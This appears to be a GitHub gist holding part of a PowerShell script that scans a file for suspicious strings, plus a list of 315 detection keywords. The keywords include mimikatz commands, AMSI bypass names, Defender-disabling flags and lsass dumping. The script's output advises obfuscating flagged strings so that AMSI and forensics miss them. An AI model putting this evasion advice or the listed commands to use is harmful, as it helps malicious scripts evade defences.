Start-Sleep -Seconds 2 | |
$Hight = 0 ## Set counter to 0 | |
$Counter = 0 ## Set counter to 0 | |
ForEach($RawStringDetection in $MaliciousKeywordsList) | |
{ | |
## Search for strings or regex inside file | |
$MatchedString = (Get-Content -Path "$FileToScan"|Select-String -Pattern "$RawStringDetection" -EA SilentlyContinue) | |
If($MatchedString -iMatch "$RawStringDetection") | |
{ | |
If($RawStringDetection -imatch "$HigthRate") | |
{ | |
$Conf = "Critical" | |
$ColorSet = "Red" | |
$Hight = $Hight + 1 | |
} | |
ElseIf($RawStringDetection -imatch "$MediumRate") | |
{ | |
$Conf = "Medium" | |
$ColorSet = "DarkMagenta" | |
} | |
Else | |
{ | |
$Conf = "Low" | |
$ColorSet = "DarkYellow" | |
} | |
## Get file description | |
$Description = (Get-ChildItem -Path "$FileToScan"|Select-Object *) | |
$Name = $Description.PSChildName | |
$Line = $MatchedString.LineNumber | |
$Counter = $Counter + 1 | |
If($RateHigh.IsPresent) | |
{ | |
## Only display 'rate high' | |
If($ColorSet -match '^(Red)$') | |
{ | |
## Output results OnScreen | |
If($RawStringDetection -match '.\*[^"]') | |
{ | |
$RawStringDetection = $RawStringDetection -replace '.\*','($' | |
} | |
Else | |
{ | |
$RawStringDetection = $RawStringDetection -replace '.\*','(' | |
} | |
write-host "`nToken : $Hight" | |
write-host "DetectionRate : $Conf" | |
write-host "MaliciousString : " -NoNewline | |
write-host "$RawStringDetection" -ForegroundColor $ColorSet | |
write-host "LineNumber : $Line" | |
} | |
} | |
Else | |
{ | |
## Display 'rate low,medium and high' | |
If($RawStringDetection -match '.\*[^"]') | |
{ | |
$RawStringDetection = $RawStringDetection -replace '.\*','($' | |
} | |
Else | |
{ | |
$RawStringDetection = $RawStringDetection -replace '.\*','(' | |
} | |
write-host "`nToken : $Counter" | |
write-host "DetectionRate : $Conf" | |
write-host "MaliciousString : " -NoNewline | |
write-host "$RawStringDetection" -ForegroundColor $ColorSet | |
write-host "LineNumber : $Line" | |
} | |
## Logfile creation | |
If($LogFile.IsPresent) | |
{ | |
If($RateHigh.IsPresent) | |
{ | |
## Only store 'rate High' | |
If($ColorSet -match '^(Red)$') | |
{ | |
echo "`nToken : $Hight" >> "$pwd\identify_offencive_tools.log" | |
echo "DetectionRate : $Conf" >> "$pwd\identify_offencive_tools.log" | |
echo "MaliciousString : $RawStringDetection" >> "$pwd\identify_offencive_tools.log" | |
echo "LineNumber : $Line`n" >> "$pwd\identify_offencive_tools.log" | |
} | |
} | |
Else | |
{ | |
## Store 'rate low,medium and high' | |
echo "`nToken : $Counter" >> "$pwd\identify_offencive_tools.log" | |
echo "DetectionRate : $Conf" >> "$pwd\identify_offencive_tools.log" | |
echo "MaliciousString : $RawStringDetection" >> "$pwd\identify_offencive_tools.log" | |
echo "LineNumber : $Line`n" >> "$pwd\identify_offencive_tools.log" | |
} | |
} | |
} | |
} | |
If($Counter -eq 0) | |
{ | |
write-host "🎖️ " -NoNewline | |
write-host "congratz, cmdlet didnt find any suspicious strings inside file." | |
Remove-Item -Path "$pwd\identify_offencive_tools.log" -Force | |
} | |
## Set output color based on rating | |
If($Counter -gt 0){$CColor = "Red"}Else{$CColor = "Green"} | |
If($Hight -gt 0){$SetColor = "Red"}Else{$SetColor = "Green"} | |
write-host "`n`n🍳 File scanning report" -ForegroundColor DarkYellow | |
write-host "=====================================================================================" | |
write-host "Tokens found : " -NoNewline | |
write-host "$Counter" -ForegroundColor $CColor | |
write-host "Urgent attention : " -NoNewline | |
write-host "$Hight" -ForegroundColor $SetColor | |
write-host "File total lines : $ScriptSize" | |
## Invoke-CountObfuscationChars | |
Invoke-CountObfuscationChars | |
## Invoke-MaliciousVarsScan | |
Invoke-MaliciousVarsScan | |
$AllSettings = (Get-Date) | |
$ScanDay = $AllSettings.Day | |
$ScanYear = $AllSettings.Year | |
$DayOfTheWeek = $AllSettings.DayOfWeek | |
$ElapsTime = $(Get-Date) - $ScanStartTimer | |
$TotalTime = "{0:HH:mm:ss}" -f ([datetime]$ElapsTime.Ticks) ## Count the diferense between 'start|end' scan duration! | |
Write-Host "Scan elapsed time : $TotalTime ⏱️ $ScanDay $DayOfTheWeek $ScanYear" | |
Write-Host "File scanned : $FileToScan" | |
## Recomendations | |
If($Hight -gt 0) | |
{ | |
write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow | |
write-host " Its advice to obfuscate all high rate results found [" -NoNewline | |
write-host "$Hight" -ForegroundColor Red -NoNewline | |
write-host "]" | |
write-host " because " -NoNewline | |
write-host "System.Management.Automation.Amsi" -ForegroundColor DarkYellow -NoNewline | |
write-host " contains entry" | |
write-host " http://bit.ly/System_Management_Automation_Engine_Runtime" | |
} | |
If(Test-Path -Path "$Env:TMP\Recomendation.log") | |
{ | |
write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow | |
write-host " Its advice to reduce the number of special characters" | |
write-host " inside file like [" -NoNewline | |
write-host "``+&'" -ForegroundColor Red -NoNewline | |
write-host "] that reveal to forensics that" | |
write-host " we are dealing with an heavily obfuscated file\script" | |
write-host " URL: http://bit.ly/malicious-powershell-usage-detection" | |
} | |
If(Test-Path -Path "$Env:TMP\SuspiciousVars.log") | |
{ | |
write-host "`n⚙️ recomendation" -ForegroundColor DarkYellow | |
write-host " Its advice to reduce the size of variable names to less than" | |
write-host " 40 chars because large variable names are used in obfuscation" | |
} | |
write-host "=====================================================================================`n`n" | |
Remove-Item -Path "$Env:TMP\Recomendation.log" -Force | |
Remove-Item -Path "$Env:TMP\SuspiciousVars.log" -Force | |
exit |
Author
r00t-3xp10it
commented
Dec 21, 2023
•
List Of Malicious Strings - 315 entries
IEX
-enc
-nop
amsi
virus
keylog
trojan
cmd /c
malware
payload
revshell
mimikatz
amsi.dll
-bxor
hashdump
Add-Type
phishing
-encoded
DllImport
obfuscate
impersonate
reverseshell
ExclusionPath
reverse shell
reverse-shell
AmsiScanBuffer
invoke-mimikatz
-encodedcommand
ExclusionProcess
Invoke-Expression
lazagne.exe all
red teaming
amsiutils
amsiInitFailed
keystroke
buffer overflow
bruteforce
redteam
red team
shellcode
fileless
privesc
escalate privileges
password guessing
guess login
credential dump
password spraying
password spray
cleartext passwords
remote execution
creds dump
credentials dump
pass the hash
pass-the-hash
golden ticket
dumping the lsass
dumping lsass
dump lsass
cached credentials
lsa secrets
crypto::scauth
impersonating user
impersonate user
impacket
lsass dump
procdump
obfuscated
obfuscation
pwdump
command and control
dropper
web shell
webshell
kerberos relay
spoofing
elevate privilege
abuse elevation
bypass uac
uac bypass
access token manipulation
token impersonation
token theft
evade process-monitoring
bypass password
victim ip
sniffing
poisoning
elevate process privileges
elevate its privileges
bypass user account control
powershell -ep bypass
powershell -executionpolicy bypass
Rubeus.exe dump
exploit
keylogger
sniffer
password crack
password hacking
password breach
password attack
password stealer
bypass antivirus
brute force
remote access
password hashing
code injection
keystroke logging
keylogging
password sniffing
cipher
cookie stealing
password cracking
encryption
privilege escalation
key logging
password harvesting
eavesdropping
brute-forcing
cookie theft
reflection attack
crypto attack
smurfing
ping of death
credential theft
keylogger installation
hashing
fileless attack
impersonation
fileless malware
payload delivery
antivirus evasion
data obfuscation
ldap injection
decryption
DefineDynamicAssembly
DefineDynamicModule
DefineType
DefineConstructor
CreateType
DefineLiteral
DefineEnum
DefineField
ILGenerator
Emit
UnverifiableCodeAttribute
DefinePInvokeMethod
GetTypes
GetAssemblies
Methods
GetConstructor
GetConstructors
GetDefaultMembers
GetEvent
GetEvents
GetField
GetFields
GetInterface
GetInterfaceMap
GetInterfaces
GetMember
GetMembers
GetMethod
GetMethods
GetNestedType
GetNestedTypes
GetProperties
GetProperty
InvokeMember
MakeArrayType
MakeByRefType
MakeGenericType
MakePointerType
DeclaringMethod
DeclaringType
ReflectedType
TypeHandle
TypeInitializer
UnderlyingSystemType
InteropServices
AllocHGlobal
PtrToStructure
StructureToPtr
FreeHGlobal
IntPtr
MemoryStream
DeflateStream
FromBase64String
EncodedCommand
Bypass
ToBase64String
ExpandString
GetPowerShell
OpenProcess
VirtualAlloc
VirtualFree
WriteProcessMemory
CreateUserThread
CloseHandle
GetDelegateForFunctionPointer
kernel32
CreateThread
memcpy
LoadLibrary
GetModuleHandle
GetProcAddress
VirtualProtect
FreeLibrary
ReadProcessMemory
CreateRemoteThread
AdjustTokenPrivileges
WriteByte
WriteInt32
OpenThreadToken
PtrToString
ZeroFreeGlobalAllocUnicode
OpenProcessToken
GetTokenInformation
SetThreadToken
ImpersonateLoggedOnUser
RevertToSelf
GetLogonSessionData
CreateProcessWithToken
DuplicateTokenEx
OpenWindowStation
OpenDesktop
MiniDumpWriteDump
AddSecurityPackage
EnumerateSecurityPackages
GetProcessHandle
DangerousGetHandle
GetAsyncKeyState
KeyboardState
GetForegroundWindow
BindingFlags
NonPublic
ScriptBlockLogging
LogPi2pelineExecutionDetails
ProtectedEventLogging
while($true)
powershell -version 2
SetValue($null$true)
.Write($st0$st.Length)
schtasks /create
Set-MpPreference
AlwaysInstallElevated
runas
Add-Exfiltration
Add-Persistence
Add-RegBackdoor
Add-ScrnSaveBackdoor
Enabled-DuplicateToken
Get-Keystrokes
LSASecret
Get-PassHash
Get-RegAlwaysInstallElevated
Get-Screenshot
Get-ServiceUnquoted
Get-System
Get-Vedential
Invoke-BypassUAC
Invoke-DllInjection
Invoke-Mimikittenz
Invoke-PSInject
Invoke-PsExec
Invoke-RunAs
Invoke-WScriptBypassUAC
Out-Minidump
AmsiBypass
nishang
Invoke-ShellCommand
-dumpcr
SeImpersonate
SeDebugPrivilege
crackmapexec
lsadump::sam
SEKURLSA::Pth
kerberos::ptt
kerberos::golden
sekurlsa::minidump
sekurlsa::logonPasswords
token::elevate
invoke-command
rundll32
certutil
mshta
wevtutil.exe cl
ShellExecute
sc stop WinDefend
Remove-MpThreat
sc stop Sense
amsi_disable
lsass.exe
wevtutil cl
amsicontext
/savecred
nc.exe
DumpSAM
Dump-SAM
S-1-5-32-544
-ScriptBlock
impersonateuser:
.downloadstring
ExclusionExtension
sekurlsa::tickets
system.net.webclient
MiniDumpWithHandleData
RealTimeProtectionEnabled
MiniDumpWithProcessThreadData
Invoke-WebRequest ("{0}?url={1}" -f
System.Management.Automation.
-DisableIOAVProtection $true
-DisableRealtimeProtection $true
-DisableRealtimeMonitoring $true
System.Runtime.InteropServices.Marshal
HKLM:\SOFTWARE\Microsoft\AMSI\Providers
MpCmdRun.exe -RemoveDefinitions -All
-DisableIntrusionPreventionSystem $true
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment